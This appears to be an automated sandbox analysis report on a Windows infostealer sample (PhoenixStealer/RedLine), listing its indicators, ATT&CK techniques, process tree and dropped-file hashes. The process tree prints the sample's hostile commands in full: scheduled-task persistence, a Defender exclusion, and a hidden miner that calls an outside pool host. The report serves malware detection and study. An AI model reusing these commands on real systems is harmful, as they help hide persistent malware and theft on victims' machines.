phoenixstealer | 54f4ec503268ddc6c926d59ab37dadd1455c9cab3ba3947d1aa3c58fa6aca308

Analysis

max time kernel
152s
max time network
172s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
16-04-2022 05:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

22.exe
Size

2.3MB
MD5

11fdf8c21d2059cccce0645934e29943
SHA1

77d4de585b06c62bc2ed71393cb2d6fec4bb464d
SHA256

54f4ec503268ddc6c926d59ab37dadd1455c9cab3ba3947d1aa3c58fa6aca308
SHA512

38238dbcd3cb5577753149311685d42d40dcee82b25158a9a8c7f5037186d5b68907fce4e24c64dc369465ac4390e503d48ad0ecf255200275c3de6a3549e665

Score

10^/10

phoenixstealer redline discovery infostealer persistence spyware stealer

Malware Config

Signatures

PhoenixStealer
PhoenixStealer is an information stealer written in the C++, it sends the stolen information to cybercriminals.
stealer phoenixstealer
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 6 IoCs

resource	yara_rule
behavioral2/memory/4740-139-0x00000000004E0000-0x000000000066B000-memory.dmp	family_redline
behavioral2/memory/4740-136-0x00000000004E0000-0x000000000066B000-memory.dmp	family_redline
behavioral2/memory/4740-147-0x00000000004E0000-0x000000000066B000-memory.dmp	family_redline
behavioral2/memory/4740-149-0x00000000004E0000-0x000000000066B000-memory.dmp	family_redline
behavioral2/memory/4740-150-0x00000000004E0000-0x000000000066B000-memory.dmp	family_redline
behavioral2/memory/4740-153-0x00000000004E0000-0x000000000066B000-memory.dmp	family_redline

Blocklisted process makes network request 1 IoCs

flow	pid	Process
3	4880	WScript.exe

Executes dropped EXE 4 IoCs

pid	Process
4740	s.exe
3044	setup.exe
2100	WindowsFinder.exe
5044	WindowsFinder.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	22.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	setup.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lol.bat	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lol.bat	cmd.exe

Loads dropped DLL 6 IoCs

pid	Process
2100	WindowsFinder.exe
5044	WindowsFinder.exe
2100	WindowsFinder.exe
5044	WindowsFinder.exe
2100	WindowsFinder.exe
5044	WindowsFinder.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
62	checkip.dyndns.org

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
4740	s.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3044 set thread context of 448	3044	setup.exe	84

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\869e4845-7e31-4047-a168-bbbda19a2fda.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220416073042.pma	setup.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3744	3044	WerFault.exe	79

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4000	schtasks.exe
4252	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings	22.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	3	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4740	s.exe
4740	s.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3280	powershell.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3280	powershell.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3380	msedge.exe
3380	msedge.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe
3044	setup.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	3044	setup.exe
Token: SeDebugPrivilege	4740	s.exe
Token: SeDebugPrivilege	3280	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
4960	msedge.exe
4960	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3888 wrote to memory of 4880	3888	22.exe	76
PID 3888 wrote to memory of 4880	3888	22.exe	76
PID 3888 wrote to memory of 4880	3888	22.exe	76
PID 3888 wrote to memory of 4740	3888	22.exe	77
PID 3888 wrote to memory of 4740	3888	22.exe	77
PID 3888 wrote to memory of 4740	3888	22.exe	77
PID 3888 wrote to memory of 3044	3888	22.exe	79
PID 3888 wrote to memory of 3044	3888	22.exe	79
PID 3888 wrote to memory of 4216	3888	22.exe	80
PID 3888 wrote to memory of 4216	3888	22.exe	80
PID 3888 wrote to memory of 4216	3888	22.exe	80
PID 3888 wrote to memory of 4500	3888	22.exe	82
PID 3888 wrote to memory of 4500	3888	22.exe	82
PID 3888 wrote to memory of 4500	3888	22.exe	82
PID 3044 wrote to memory of 448	3044	setup.exe	84
PID 3044 wrote to memory of 448	3044	setup.exe	84
PID 3044 wrote to memory of 448	3044	setup.exe	84
PID 3044 wrote to memory of 448	3044	setup.exe	84
PID 3044 wrote to memory of 448	3044	setup.exe	84
PID 3044 wrote to memory of 448	3044	setup.exe	84
PID 3044 wrote to memory of 448	3044	setup.exe	84
PID 3044 wrote to memory of 448	3044	setup.exe	84
PID 3044 wrote to memory of 448	3044	setup.exe	84
PID 3044 wrote to memory of 448	3044	setup.exe	84
PID 3044 wrote to memory of 4404	3044	setup.exe	85
PID 3044 wrote to memory of 4404	3044	setup.exe	85
PID 3044 wrote to memory of 4000	3044	setup.exe	87
PID 3044 wrote to memory of 4000	3044	setup.exe	87
PID 4500 wrote to memory of 4960	4500	cmd.exe	89
PID 4500 wrote to memory of 4960	4500	cmd.exe	89
PID 3044 wrote to memory of 4252	3044	setup.exe	93
PID 3044 wrote to memory of 4252	3044	setup.exe	93
PID 4960 wrote to memory of 780	4960	msedge.exe	92
PID 4960 wrote to memory of 780	4960	msedge.exe	92
PID 3044 wrote to memory of 3280	3044	setup.exe	91
PID 3044 wrote to memory of 3280	3044	setup.exe	91
PID 3044 wrote to memory of 2100	3044	setup.exe	95
PID 3044 wrote to memory of 2100	3044	setup.exe	95
PID 3044 wrote to memory of 5044	3044	setup.exe	98
PID 3044 wrote to memory of 5044	3044	setup.exe	98
PID 4960 wrote to memory of 2556	4960	msedge.exe	99
PID 4960 wrote to memory of 2556	4960	msedge.exe	99
PID 4960 wrote to memory of 2556	4960	msedge.exe	99
PID 4960 wrote to memory of 2556	4960	msedge.exe	99
PID 4960 wrote to memory of 2556	4960	msedge.exe	99
PID 4960 wrote to memory of 2556	4960	msedge.exe	99
PID 4960 wrote to memory of 2556	4960	msedge.exe	99
PID 4960 wrote to memory of 2556	4960	msedge.exe	99
PID 4960 wrote to memory of 2556	4960	msedge.exe	99
PID 4960 wrote to memory of 2556	4960	msedge.exe	99
PID 4960 wrote to memory of 2556	4960	msedge.exe	99
PID 4960 wrote to memory of 2556	4960	msedge.exe	99
PID 4960 wrote to memory of 2556	4960	msedge.exe	99
PID 4960 wrote to memory of 2556	4960	msedge.exe	99
PID 4960 wrote to memory of 2556	4960	msedge.exe	99
PID 4960 wrote to memory of 2556	4960	msedge.exe	99
PID 4960 wrote to memory of 2556	4960	msedge.exe	99
PID 4960 wrote to memory of 2556	4960	msedge.exe	99
PID 4960 wrote to memory of 2556	4960	msedge.exe	99
PID 4960 wrote to memory of 2556	4960	msedge.exe	99
PID 4960 wrote to memory of 2556	4960	msedge.exe	99
PID 4960 wrote to memory of 2556	4960	msedge.exe	99
PID 4960 wrote to memory of 2556	4960	msedge.exe	99
PID 4960 wrote to memory of 2556	4960	msedge.exe	99

C:\Users\Admin\AppData\Local\Temp\22.exe
"C:\Users\Admin\AppData\Local\Temp\22.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3888
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Windows\Temp\lol.vbs"
  2⤵
  - Blocklisted process makes network request
  PID:4880
- C:\Windows\Temp\s.exe
  "C:\Windows\Temp\s.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4740
- C:\Windows\Temp\setup.exe
  "C:\Windows\Temp\setup.exe"
  2⤵
  - Executes dropped EXE
  - Checks computer location settings
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3044
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:448
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /delete /tn WindowsService /f
    3⤵
    PID:4404
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /tn WindowsService /tr "C:\Users\Admin\AppData\Roaming\Windows Folder\Windows Service.exe" /sc onlogon /rl highest
    3⤵
    - Creates scheduled task(s)
    PID:4000
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Windows Folder'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3280
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /tn WindowsServiceUpload /tr "C:\Users\Admin\AppData\Roaming\Windows Folder\Windows Service.exe" /f /rl highest
    3⤵
    - Creates scheduled task(s)
    PID:4252
- - C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\WindowsFinder.exe
    "C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\WindowsFinder.exe" -w EQBRanNZsA8KNoHEWSKpN4yahYET0g8dcctSXT0c3cNAfNax -p https://server1.whalestonpool.com -api ":8080"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2100
- - C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\WindowsFinder.exe
    "C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\WindowsFinder.exe" -w EQBRanNZsA8KNoHEWSKpN4yahYET0g8dcctSXT0c3cNAfNax -p https://server1.whalestonpool.com -api ":8080"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5044
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 3044 -s 892
    3⤵
    - Program crash
    PID:3744
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\run.bat" "
  2⤵
  - Drops startup file
  PID:4216
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\lol.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4500
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://methodmedia.biz/?p=gmzgcobuge5gi3bpgu4dkmbz
    3⤵
    - Adds Run key to start application
    - Enumerates system info in registry
    - Modifies registry class
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:4960
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa82ea46f8,0x7ffa82ea4708,0x7ffa82ea4718
      4⤵
      PID:780
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2204,11183263044362453322,2744920651861669065,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2364 /prefetch:2
      4⤵
      PID:2556
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2204,11183263044362453322,2744920651861669065,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2416 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3380
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2204,11183263044362453322,2744920651861669065,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2672 /prefetch:8
      4⤵
      PID:1960
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,11183263044362453322,2744920651861669065,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2116 /prefetch:1
      4⤵
      PID:3924
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,11183263044362453322,2744920651861669065,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:1
      4⤵
      PID:3956
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2204,11183263044362453322,2744920651861669065,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5348 /prefetch:8
      4⤵
      PID:4332
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,11183263044362453322,2744920651861669065,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:1
      4⤵
      PID:872
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,11183263044362453322,2744920651861669065,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1
      4⤵
      PID:3440
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2204,11183263044362453322,2744920651861669065,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5696 /prefetch:8
      4⤵
      PID:2352
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2204,11183263044362453322,2744920651861669065,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6396 /prefetch:8
      4⤵
      PID:4648
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
      4⤵
      Drops file in Program Files directory
      PID:4400
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xd4,0xd8,0x110,0xd0,0x10c,0x7ff630505460,0x7ff630505470,0x7ff630505480
        5⤵
        
        PID:2660
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2204,11183263044362453322,2744920651861669065,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6396 /prefetch:8
      4⤵
      PID:3888
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2204,11183263044362453322,2744920651861669065,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1260 /prefetch:8
      4⤵
      PID:4432
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2204,11183263044362453322,2744920651861669065,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6812 /prefetch:2
      4⤵
      PID:4316
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2204,11183263044362453322,2744920651861669065,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3636 /prefetch:8
      4⤵
      PID:1908

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3952

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 408 -p 3044 -ip 3044
1⤵
PID:4408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:3952

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies

Filesize
20KB

MD5
91f3c558d0c029c98edc02c122ff84df

SHA1
cdb2446140661495cae33685cfc2fdfac2d593d3

SHA256
b14120ad3c7faec595f471aa2d7454eaef49824d76d4314295a4b50d6f44214c

SHA512
44a321d598e0a332674f9a73b6cf38fb40a818edf1fcbbce107d46b14faae87d01c7fa4720b9367f40d9723ac332d4d7f9ce61c18eebda63cba8c70e71de7a9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

Filesize
116KB

MD5
f70aa3fa04f0536280f872ad17973c3d

SHA1
50a7b889329a92de1b272d0ecf5fce87395d3123

SHA256
8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

SHA512
30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
4b6a7f838f78cd219f905ab637dae656

SHA1
79a985316239a5586466e1c9a831ca2b917dc817

SHA256
3f4895c1c2d6f49ce17e5d3563d5159b4111b1ccc90006d70a43e1ce63a5a342

SHA512
58386b875af3dda217c0a9e6383b7efe9d929fb87b26d6deb2e7ac95ca0b080d9284d13b7507ddbfffbbf41727177fc56423bcf3661a8f2082f2e513eb348b23

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\OpenCL.dll

Filesize
28KB

MD5
75c82cc70a4a8f9878959edc4e40e067

SHA1
b3858343b9e2befcc28fd465fd377da451186033

SHA256
534f2229e40b543a5a06218e1019a133db817f09735102b0ee3c8573ebcfa6fc

SHA512
68e80a79c7f514d52835abe031e33259ba63039a3513d69d714f9dd8711107a7766f7ca18ed3712be57fb16dd97cf4b933a22d7efd14e6df555a7e80493432b7

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\OpenCL.dll

Filesize
28KB

MD5
75c82cc70a4a8f9878959edc4e40e067

SHA1
b3858343b9e2befcc28fd465fd377da451186033

SHA256
534f2229e40b543a5a06218e1019a133db817f09735102b0ee3c8573ebcfa6fc

SHA512
68e80a79c7f514d52835abe031e33259ba63039a3513d69d714f9dd8711107a7766f7ca18ed3712be57fb16dd97cf4b933a22d7efd14e6df555a7e80493432b7

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\OpenCL.dll

Filesize
28KB

MD5
75c82cc70a4a8f9878959edc4e40e067

SHA1
b3858343b9e2befcc28fd465fd377da451186033

SHA256
534f2229e40b543a5a06218e1019a133db817f09735102b0ee3c8573ebcfa6fc

SHA512
68e80a79c7f514d52835abe031e33259ba63039a3513d69d714f9dd8711107a7766f7ca18ed3712be57fb16dd97cf4b933a22d7efd14e6df555a7e80493432b7

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\WindowsFinder.exe

Filesize
6.2MB

MD5
5b69b37c6acf7203fcef43fb3f1b794d

SHA1
538caf62f25dea9d174f02aead4dc846ebadc345

SHA256
6fec5ac27cb10fab24e7068393dd05dc3d811498df175a0999ba4add71791ba5

SHA512
ee4e0a86692e82ad0a79707ce0840341bc79cf8be4ee8f2a01012968fc75ffb4625017645cec069dd5e3d7b12060ef747a4d6aa5d1b3461ba0cedea777df814f

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\WindowsFinder.exe

Filesize
6.2MB

MD5
5b69b37c6acf7203fcef43fb3f1b794d

SHA1
538caf62f25dea9d174f02aead4dc846ebadc345

SHA256
6fec5ac27cb10fab24e7068393dd05dc3d811498df175a0999ba4add71791ba5

SHA512
ee4e0a86692e82ad0a79707ce0840341bc79cf8be4ee8f2a01012968fc75ffb4625017645cec069dd5e3d7b12060ef747a4d6aa5d1b3461ba0cedea777df814f

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\libcrypto-1_1-x64.dll

Filesize
3.3MB

MD5
32d7e884189e301c3cd4b6993abb283f

SHA1
793fa8e8e51c591c520e906061313e8f97287440

SHA256
5862fb9df1dfc0ad0c1fe9034aeb057633828e12fbc00d2b044e364758bf9519

SHA512
b64ca1444b94ec324a74efaa3f78e8d3195f60a7364ff5ee1f3f5d27859fc4790d13a780232bb328cb571765abc96caebf275de5573bfc146931fa989a02943b

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\libcrypto-1_1-x64.dll

Filesize
3.3MB

MD5
32d7e884189e301c3cd4b6993abb283f

SHA1
793fa8e8e51c591c520e906061313e8f97287440

SHA256
5862fb9df1dfc0ad0c1fe9034aeb057633828e12fbc00d2b044e364758bf9519

SHA512
b64ca1444b94ec324a74efaa3f78e8d3195f60a7364ff5ee1f3f5d27859fc4790d13a780232bb328cb571765abc96caebf275de5573bfc146931fa989a02943b

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\libcrypto-1_1-x64.dll

Filesize
3.3MB

MD5
32d7e884189e301c3cd4b6993abb283f

SHA1
793fa8e8e51c591c520e906061313e8f97287440

SHA256
5862fb9df1dfc0ad0c1fe9034aeb057633828e12fbc00d2b044e364758bf9519

SHA512
b64ca1444b94ec324a74efaa3f78e8d3195f60a7364ff5ee1f3f5d27859fc4790d13a780232bb328cb571765abc96caebf275de5573bfc146931fa989a02943b

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\toncrypto.dll

Filesize
3.6MB

MD5
703f25116760b08f24401832edb0014f

SHA1
631bdb041296c58849648a447afd7046246747a1

SHA256
c6c5e99afcd785b64058f1180f26b3f44b616d056f68990659d077666456f558

SHA512
